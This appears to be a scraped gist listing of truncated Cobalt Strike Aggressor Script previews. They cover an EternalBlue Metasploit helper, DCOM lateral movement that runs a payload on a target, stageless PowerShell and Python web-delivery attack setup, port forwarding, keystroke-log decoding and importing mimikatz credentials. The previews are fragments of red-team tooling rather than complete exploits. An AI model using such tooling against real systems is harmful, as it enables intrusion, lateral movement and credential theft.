This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# script to help move around with ms17-010 from Metasploit | |
# Go to Attacks -> Eternal Blue | |
# | |
# target, listener, where to save .rc file | |
sub generate_rc_file { | |
local('$target $listener $where $handle $shellcode'); | |
($target, $listener, $where) = @_; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Demonstrate how to queue tasks to execute with each checkin... | |
# | |
# | |
# yield tells a function to pause and return a value. The next time the same instance of the | |
# function is called, it will resume after where it last yielded. | |
# | |
sub stuffToDo { | |
# Tasks for first checkin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Lateral Movement alias | |
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ | |
# register help for our alias | |
beacon_command_register("com-exec", "lateral movement with DCOM", | |
"Synopsis: com-exec [target] [listener]\n\n" . | |
"Run a payload on a target via DCOM MMC20.Application Object"); | |
# here's our alias to collect our arguments | |
alias com-exec { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# demonstrate how to add a popup handler to a Swing component in Sleep | |
import java.awt.*; | |
import javax.swing.*; | |
import javax.swing.event.*; | |
# safely add a listener to show a popup | |
sub setupPopupMenu { | |
# we're using fork({}) to run this in a separate Aggressor Script environment. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# port foreward alias in Beacon and SSH | |
# | |
# pull common code into a function | |
sub _portfwd { | |
if ($2 eq "stop") { | |
btask($1, "Tasked session to stop forward to $3"); | |
call("beacons.pivot_stop_port", $null, $3); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# search for and reproduce output that matches a specific regex. | |
alias search { | |
local('$regex $regex2 $entry $event $bid $out $when'); | |
# take all of the args, without processing/parsing as normal. | |
if (strlen($0) > 7) { | |
$regex = substr($0, 7); | |
} | |
else { | |
berror($1, "search [regex]"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Scripted Web Delivery (Stageless) | |
# | |
# This script demonstrates some of the new APIs in Cobalt Strike 3.7. | |
# setup our stageless PowerShell Web Delivery attack | |
sub setup_attack { | |
local('%options $script $url $arch'); | |
%options = $3; | |
# get the arch right. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# convert comma separated keystroke values into a string. | |
sub toString { | |
local('@temp'); | |
@temp = split(",", $1); | |
shift(@temp); | |
return join("", map({ | |
return chr(parseNumber($1, 16, 10)); | |
}, @temp)); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# import mimikatz creds from a file. | |
# go to View -> Script Console | |
# load this script | |
# type importcreds /path/to/file.txt | |
sub process { | |
if ($luser eq "(null)" || $luser eq "") { | |
return; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Python Stageless Scripted Web Delivery | |
# setup our stageless Python Web Delivery attack | |
sub setup_attack { | |
local('%options $x86payload $x64payload $url $script'); | |
%options = $3; | |
# generate our stageless x86 payload | |
artifact_stageless(%options["listener"], "raw", "x86", $null, $this); | |
yield; |
NewerOlder